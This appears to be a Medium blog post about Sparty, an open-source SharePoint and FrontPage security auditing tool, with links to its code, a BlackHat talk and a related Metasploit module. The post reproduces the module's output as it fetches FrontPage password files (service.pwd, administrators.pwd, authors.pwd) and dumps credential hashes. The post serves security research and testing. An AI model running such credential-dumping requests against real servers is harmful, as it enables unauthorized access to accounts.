Sparty : Useful Tools Die Hard !

Sparty was designed to conduct efficient security assessment of MS Sharepoint deployments. The tool has been used by security community which shows the acceptability and and highlighting that the tool is useful.

Sparty was presented at BlackHat 2013 and the presentation is available at: https://media.blackhat.com/us-13/Arsenal/us-13-Sood-Sparty-Slides.pdf

Overview

Sparty is an open source tool written in python to audit web applications using Sharepoint and frontpage architecture. The motivation behind this tool is to provide an easy and robust way to scrutinize the security configurations of Sharepoint and frontpage based web applications. Due to the complex nature of these web administration software, it is required to have a simple and efficient tool that gathers information, check access permissions, dump critical information from default files and perform automated exploitation if security risks are identified. A number of automated scanners fall short of this and Sparty is a solution to that.

The tool is hosted here: https://github.com/adityaks/sparty

Sparty has been enhanced by other researchers as well. Links are presented below.

https://github.com/0xdevalias/ added then support for “NTLM Authentication” which was good enhancement to test for authenticated Ms Sharepoint deployments.

More details here: https://blog.devalias.net/post/66844345127/sparty-sharepoint-frontpage-auditing-tool-now-with-more

Further, the Sparty source code has also been used to draft an “Auxiliary Scanner” Metasploit Framework for the vulnerability reported many years ago. Details are presented below:

Vulnerability: https://insecure.org/sploits/Microsoft.frontpage.insecurities.html

Metasploit Framework Module — https://github.com/rapid7/metasploit-framework/pull/10534/files

https://insecure.org/sploits/Microsoft.frontpage.insecurities.html

https://www.rapid7.com/db/modules/auxiliary/scanner/http/frontpage_credential_dump

The msf module works (referenced from: https://github.com/rapid7/metasploit-framework/pull/10534/files ) as shown below:

msf auxiliary(scanner/http/frontpage_credential_dump) > run[*] Requesting: /about/_vti_pvt/service.pwd

[*] Found /about/_vti_pvt/service.pwd.
[*] Found FrontPage credentials.
[+] 10.10.10.10 — service.pwd
[*] Requesting: /about/_vti_pvt/administrators.pwd
[*] Found /about/_vti_pvt/administrators.pwd.
[*] Found FrontPage credentials.
[+] 10.10.10.10 — administrators.pwd
[*] Requesting: /about/_vti_pvt/authors.pwd
[*] Found /about/_vti_pvt/authors.pwd.
[*] Found FrontPage credentials.
[+] 10.10.10.10 — authors.pwdFrontPage

Credentials

=====================
Source Username Password Hash
— — — — — — — — — — — — — —
Administrators e-scan.com xMyvw4d3c1oWY
Authors e-scan.com xMyvw4d3c1oWY
Service e-scan.com jLAsITPJ8AsaR

[*] Credentials saved in: /root/.msf4/loot/20180921124828_default_10.10.10.10_frontpage.creds_090555.txt

Rapid 7 has added the the auxillary scanner for “frontpage_credential_dump” considering the database entry as shown below:

Rapid 7: Auxiliary Scanner

Note: Thanks to all the researchers who further contributed to enhance the tool. Appreciate the fact that work has been credited as well.

Learn, Share and Enjoy !

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

What is Context in Android and which one should you use?

As Abstract As Context

Configuration for Data sources in Databricks (python)

What are the Emerging Trends in Software Testing?

Quick Sort Algorithm

Lessons learnt from building reactive microservices for Canva Live

Decision Making in Programming

When Should You Use AWS Honeycode ?

🧑‍💻 MoneDigi 🧑‍💻

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Aditya K Sood

Aditya K Sood

More from Medium

How to securely erase and wipe your hard drive on Windows 10 and Windows 11 — OnMSFT.com

Ready for FREE vouchers for Microsoft Certifications?

Basic password cracking with hashcat

How to install Impacket tools in any linux